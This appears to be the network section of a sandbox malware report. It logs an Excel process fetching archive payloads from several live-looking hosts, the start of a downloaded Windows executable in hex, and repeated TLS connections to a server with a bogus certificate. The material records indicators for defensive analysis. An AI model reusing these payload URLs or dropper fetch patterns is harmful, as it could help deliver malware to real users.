                                                                                ETag: "2a38d0-bae00-5b9512357cf00-gzip"
                                                                                Accept-Ranges: bytes
                                                                                Vary: Accept-Encoding,User-Agent
                                                                                Content-Encoding: gzip
                                                                                Keep-Alive: timeout=5
                                                                                Transfer-Encoding: chunked
                                                                                Content-Type: application/x-rar-compressed
                                                                                Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd 77 5c 13 cf f7 2f 3c a1 46 04 83 08 8a 8a 8a ba 2a 8a 02 8a 05 c5 42 09 b8 68 90 5e 14 44 54 44 c4 8e c1 0a 88 04 90 b0 44 b0 77 4c 0f 89 1d 1b a2 d2 a5 c8 0a 8a 15 1b 76 17 c1 86 0a 2a ea 3e 33 1b 3e df f2 bb f7 3e f7 f5 fc ff 44 c3 66 77 a7 ed ec 9c 73 de e7 cc 99 33 de f3 72 80 2e 00 40 0f 7e 69 1a 80 02 a0 fd b8 80 ff fb e7 07 fc f6 18 54 d8 03 9c ef 76 73 70 01 8b 77 73 70 60 cc b2 75 d6 6b e2 56 2f 8d 5b b8 d2 7a f1 c2 55 ab 56 f3 ad 17 2d b1 8e 8b 5f 65 bd 6c 95 35 d7 27 c0 7a e5 ea a8 25 76 26 26 46 58 57 19 63 27 f8 0d 8e 0f 9c 11 f7 cf 37 ef f8 97 38 3e 3c 6e 34 78 19 b7 81 39 3e ef 3a 6f 8a db cc 1c 9f 31 d7 f3 8e 7f 8b 5b cf e4 99 1e 37 95 b9 fe aa 2b dd a3 ae 74 af bb ce 5f 30 47 ff 65 8b 63 50 f9 ff b4 dd d7 03 00 1e 4b 1f 58 34 3d f1 ff e7 da 73 a0 33 b8 3b cb 18 80 a8 ee 00 f4 66 31 d7 0e ac 36 02 c0 14 fe 48 ee 8e 4e 4d 99 df 3a 00 18 74 e5 f9 e7 08 ce 18 6b 3b 91 b9 ed c2 62 32 99 6a b3 68 8f da 43 64 5c 77 e0 0d 8f e1 6b 8d c1 54 74 31 d9 18 98 ea ff 6f 3a 37 c7 18 50 fd 60 7a 98 c9 e9 ff e5 1d d8 7c 63 fd f7 bb 5a 63 0c c2 59 ff e7 f4 76 fc 25 1b f9 f0 78 72 51 77 6d 83 d0 b3 ea fd 77 1a 6b 58 ad 5d d4 42 fe 42 f8 bb 9a 02 da 67 87 6d 01 31 dd ff 2b 1d ac b7 c4 6e 99 36 a1 75 37 6d dd 00 76 17 48 f9 5f d2 b9 d8 c5 ad 8b 5b 0c 7f 33 cf 0a 9f 99 e9 b8 ac ff 5d ba 25 2b 56 c3 84 e8 d9 51 1f 00 2b 78 dc f5 bf a4 73 fb 3f 3f e1 ff ff f9 ff fa 91 fc 62 99 96 c3 ef 25 f8 15 c2 ef 5e f8 f5 fd c9 32 3d 03 bf d6 f0 f7 3f e9 78 7e 46 a6 81 22 23 53 9f 83 46 a6 31 1d 46 ff ba fe a3 c5 c8 74 77 44 77 d3 b2 83 ff be f6 9f 9f 7f 68 0c 92 0d f0 83 df 35 70 cc ae a1 58 ff 75 0f be 69 60 0e bf 15 f0 5e 05 bc 27 41 17 7d fd 82 25 e6 87 13 59 8e 15 be 22 2e 66 1c 25 43 17 89 2f c4 8e 1f 90 65 51 3d 85 4b 01 95 b5 2f 0c f8 c6 d2 31 54 cf 40 96 88 87 99 53 c7 37 87 01 6d 82 58 10 ab 03 b3 99 fa 56 71 31 6b 94 93 fa 74 7d 69 d7 3d 22 9d 0d 07 bd 5f 2c f0 a5 a6 74 1b 03 04 15 c6 30 33 1b 26 34 a7 e1 87 0a 9e 06 0b e1 c1 1a 85 26 28 e3 dc 08 41 85 69 39 89 3e b0 aa 4e 33 27 56 d4 ff b9 7d b1 91 d4 3a bb 58 40 7c 16 54 e8 09 f9 18 3b ad 1d 15 8b ee f0 39 44 1d 75 1c d4 d2 55 06 a3 61 73 5b 74 1c db 61 25 a3 33 b9 18 46 04 62 36 7e f0 c4 da 3f c3 33 9c e0 62 36 be 7e 31 03 0d 61 3b eb 60 66 1b a6 4d 3a ac 5a 3a 98 5a 91 31 10 10 d5 d4 f7 cc f0 ff 7d 03 1b 3f 06 05 13 5f 42 a2 ab 3c 4d 75 00 fc 6b a6 0b 2a 3d f5 e0 57 1f 38 36 88 92 70 c7 9a e8 c9 73 cc 92 2c 88 aa a7 be b7 04 a5 ac a7 a6 9c e2 55 66 82 12 b6 f3 cd 84 0f 9c 62 4f 53 41 19 4b 50 65 e9 7c 2b e1 5e 2c 78 fa 50 34 87 4d f5 9d 5a 49 c7 02 d1 1c 63 aa 3e c4 1d 2c 88 98 af ed 09 ed 07 b6 55 2f 20 98 e0 63 a6 44 23 91 91 05 db 12 22 24 4c 59 a8 f7 45 5b 6c 2e 4f 41 1d 02 be 2a 62 51 a3 41 ef 1f b4 af 88 b0 86 3d 4f a5 32 45 85 95 b1 01 f9 5f 1f d8 bf 62 83 89 ff f4 6f 40 50 70 c8 7f f4 b0 79 d7 08 68 8e 79
                                                                                Data Ascii: 1faaw\/<F*Bh^DTDDwLv*>3>>Dfws3r.@~iTvspwsp`ukV/[zUV-_el5'z%v&&FXWc'78><n4x9>:o1[7+t_0GecPKX4=s3;f16HNM:tk;b2jhCd\wkTt1o:7P`z|cZcYv%xrQwmwkX]BBgm1+n6u7mvH_[3]%+VQ+xs??b%^2=?x~F"#SF1FtwDwh5pXui`^'A}%Y".f%C/eQ=K/1T@S7mXVq1kt}i="_,t03&4&(Ai9>N3'V}:X@|T;9DuUas[ta%3Fb6~?3b6~1a;`fM:Z:Z1}?_B<Muk*=W86ps,UfbOSAKPe|+^,xP4MZIc>,U/ cD#"$LYE[l.OA*bQA=O2E_bo@Ppyhy


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                4192.168.2.224916985.17.252.20780C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                TimestampkBytes transferredDirectionData
                                                                                Jan 20, 2021 16:13:30.386687040 CET1663OUTGET /uzssv27.rar HTTP/1.1
                                                                                Accept: */*
                                                                                UA-CPU: AMD64
                                                                                Accept-Encoding: gzip, deflate
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                Host: laureys.be
                                                                                Connection: Keep-Alive
                                                                                Jan 20, 2021 16:13:30.439138889 CET1663INHTTP/1.1 302 Found
                                                                                Date: Wed, 20 Jan 2021 15:13:30 GMT
                                                                                Server: Apache
                                                                                Location: http://laureys.be/cgi-sys/suspendedpage.cgi
                                                                                Content-Length: 227
                                                                                Keep-Alive: timeout=5, max=100
                                                                                Connection: Keep-Alive
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6c 61 75 72 65 79 73 2e 62 65 2f 63 67 69 2d 73 79 73 2f 73 75 73 70 65 6e 64 65 64 70 61 67 65 2e 63 67 69 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://laureys.be/cgi-sys/suspendedpage.cgi">here</a>.</p></body></html>
                                                                                Jan 20, 2021 16:13:31.319897890 CET1664OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                                                                Accept: */*
                                                                                UA-CPU: AMD64
                                                                                Accept-Encoding: gzip, deflate
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                Host: laureys.be
                                                                                Connection: Keep-Alive
                                                                                Jan 20, 2021 16:13:31.405452013 CET1664INHTTP/1.1 200 OK
                                                                                Date: Wed, 20 Jan 2021 15:13:31 GMT
                                                                                Server: Apache
                                                                                Keep-Alive: timeout=5, max=99
                                                                                Connection: Keep-Alive
                                                                                Transfer-Encoding: chunked
                                                                                Content-Type: text/html


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                5192.168.2.224917664.37.52.13880C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                TimestampkBytes transferredDirectionData
                                                                                Jan 20, 2021 16:14:29.273102045 CET1775OUTGET /by9zwa7p1.zip HTTP/1.1
                                                                                Accept: */*
                                                                                UA-CPU: AMD64
                                                                                Accept-Encoding: gzip, deflate
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                Host: cms.ivpr.org
                                                                                Connection: Keep-Alive
                                                                                Jan 20, 2021 16:14:29.931037903 CET1778INHTTP/1.1 200 OK
                                                                                Date: Wed, 20 Jan 2021 15:14:27 GMT
                                                                                Server: Apache
                                                                                Strict-Transport-Security: max-age=63072000; includeSubdomains;
                                                                                X-Frame-Options: SAMEORIGIN
                                                                                Last-Modified: Thu, 14 Jan 2021 04:03:15 GMT
                                                                                Accept-Ranges: bytes
                                                                                Content-Length: 765440
                                                                                Cache-Control: max-age=2592000
                                                                                Expires: Fri, 19 Feb 2021 15:14:27 GMT
                                                                                Keep-Alive: timeout=5, max=50
                                                                                Connection: Keep-Alive
                                                                                Content-Type: application/zip
                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 31 35 51 21 75 54 3f 72 75 54 3f 72 75 54 3f 72 a8 ab f1 72 74 54 3f 72 78 06 e2 72 77 54 3f 72 78 06 e0 72 74 54 3f 72 78 06 df 72 7a 54 3f 72 78 06 de 72 77 54 3f 72 a8 ab f4 72 76 54 3f 72 75 54 3e 72 3c 54 3f 72 78 06 e3 72 74 54 3f 72 78 06 da 72 7a 54 3f 72 78 06 e4 72 74 54 3f 72 78 06 e1 72 74 54 3f 72 52 69 63 68 75 54 3f 72 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 15 df dc 52 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0c 00 00 64 0b 00 00 16 01 00 00 00 00 00 98 6f 0a 00 00 10 00 00 00 80 0b 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 0c 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 60 72 0b 00 4d 00 00 00 5c 71 0c 00 3c 00 00 00 00 80 0c 00 10 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 0c 00 e8 1a 00 00 60 10 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 f4 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 0c 00 5c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ad 62 0b 00 00 10 00 00 00 64 0b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 c8 e8 00 00 00 80 0b 00 00 1a 00 00 00 68 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 20 09 00 00 00 70 0c 00 00 0a 00 00 00 82 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 10 05 00 00 00 80 0c 00 00 06 00 00 00 8c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e8 1a 00 00 00 90 0c 00 00 1c 00 00 00 92 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$15Q!uT?ruT?ruT?rrtT?rxrwT?rxrtT?rxrzT?rxrwT?rrvT?ruT>r<T?rxrtT?rxrzT?rxrtT?rxrtT?rRichuT?rPELR!do@`rM\q<`8(@p\.textbd `.datah@.idata p@@.rsrc@@.reloc@B


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                6192.168.2.2249181185.32.190.11580C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                TimestampkBytes transferredDirectionData
                                                                                Jan 20, 2021 16:14:31.949980021 CET2614OUTGET /d8ms3mljy.zip HTTP/1.1
                                                                                Accept: */*
                                                                                UA-CPU: AMD64
                                                                                Accept-Encoding: gzip, deflate
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                Host: salaodigitalautomovel.pt.deve.pt
                                                                                Connection: Keep-Alive
                                                                                Jan 20, 2021 16:14:32.020127058 CET2615INHTTP/1.1 404 Not Found
                                                                                Date: Wed, 20 Jan 2021 15:14:29 GMT
                                                                                Server: Apache
                                                                                Content-Length: 315
                                                                                Keep-Alive: timeout=5, max=100
                                                                                Connection: Keep-Alive
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                HTTPS Packets

                                                                                TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                Jan 20, 2021 16:14:23.457039118 CET194.225.58.214443192.168.2.2249171CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUCN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUSun Jan 10 12:16:33 CET 2021Sun Jul 11 13:16:33 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:14:26.228542089 CET194.225.58.214443192.168.2.2249170CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUCN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUSun Jan 10 12:16:33 CET 2021Sun Jul 11 13:16:33 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:14:31.550004005 CET194.225.58.214443192.168.2.2249179CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUCN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUSun Jan 10 12:16:33 CET 2021Sun Jul 11 13:16:33 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:14:34.591666937 CET194.225.58.214443192.168.2.2249183CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUCN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUSun Jan 10 12:16:33 CET 2021Sun Jul 11 13:16:33 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:14:39.169614077 CET194.225.58.214443192.168.2.2249186CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUCN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUSun Jan 10 12:16:33 CET 2021Sun Jul 11 13:16:33 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:14:39.331029892 CET194.225.58.214443192.168.2.2249187CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUCN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUSun Jan 10 12:16:33 CET 2021Sun Jul 11 13:16:33 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:14:43.089103937 CET194.225.58.214443192.168.2.2249191CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUCN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUSun Jan 10 12:16:33 CET 2021Sun Jul 11 13:16:33 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:14:43.135684967 CET194.225.58.214443192.168.2.2249192CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUCN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUSun Jan 10 12:16:33 CET 2021Sun Jul 11 13:16:33 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:14:50.108299017 CET194.225.58.214443192.168.2.2249199CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUCN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUSun Jan 10 12:16:33 CET 2021Sun Jul 11 13:16:33 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:14:53.840101957 CET194.225.58.214443192.168.2.2249204CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUCN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUSun Jan 10 12:16:33 CET 2021Sun Jul 11 13:16:33 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:14:58.035561085 CET194.225.58.214443192.168.2.2249209CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUCN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUSun Jan 10 12:16:33 CET 2021Sun Jul 11 13:16:33 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:15:00.493616104 CET194.225.58.214443192.168.2.2249212CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUCN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUSun Jan 10 12:16:33 CET 2021Sun Jul 11 13:16:33 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:15:02.345410109 CET194.225.58.214443192.168.2.2249216CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUCN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUSun Jan 10 12:16:33 CET 2021Sun Jul 11 13:16:33 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:15:04.048556089 CET194.225.58.214443192.168.2.2249222CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUCN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUSun Jan 10 12:16:33 CET 2021Sun Jul 11 13:16:33 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:15:05.136898041 CET194.225.58.214443192.168.2.2249225CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUCN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUSun Jan 10 12:16:33 CET 2021Sun Jul 11 13:16:33 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:15:06.546210051 CET194.225.58.214443192.168.2.2249228CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUCN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUSun Jan 10 12:16:33 CET 2021Sun Jul 11 13:16:33 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:15:08.364630938 CET194.225.58.214443192.168.2.2249232CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUCN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUSun Jan 10 12:16:33 CET 2021Sun Jul 11 13:16:33 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:15:10.071746111 CET194.225.58.214443192.168.2.2249238CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUCN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUSun Jan 10 12:16:33 CET 2021Sun Jul 11 13:16:33 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                                                                                Jan 20, 2021 16:15:11.177829027 CET194.225.58.214443192.168.2.2249241CN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUCN=aytinchentref.miensin6erycent.boats, O=Dfiom Hsfrof NL, L=Moscow, ST=Dramewid7, C=RUSun Jan 10 12:16:33 CET 2021Sun Jul 11 13:16:33 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
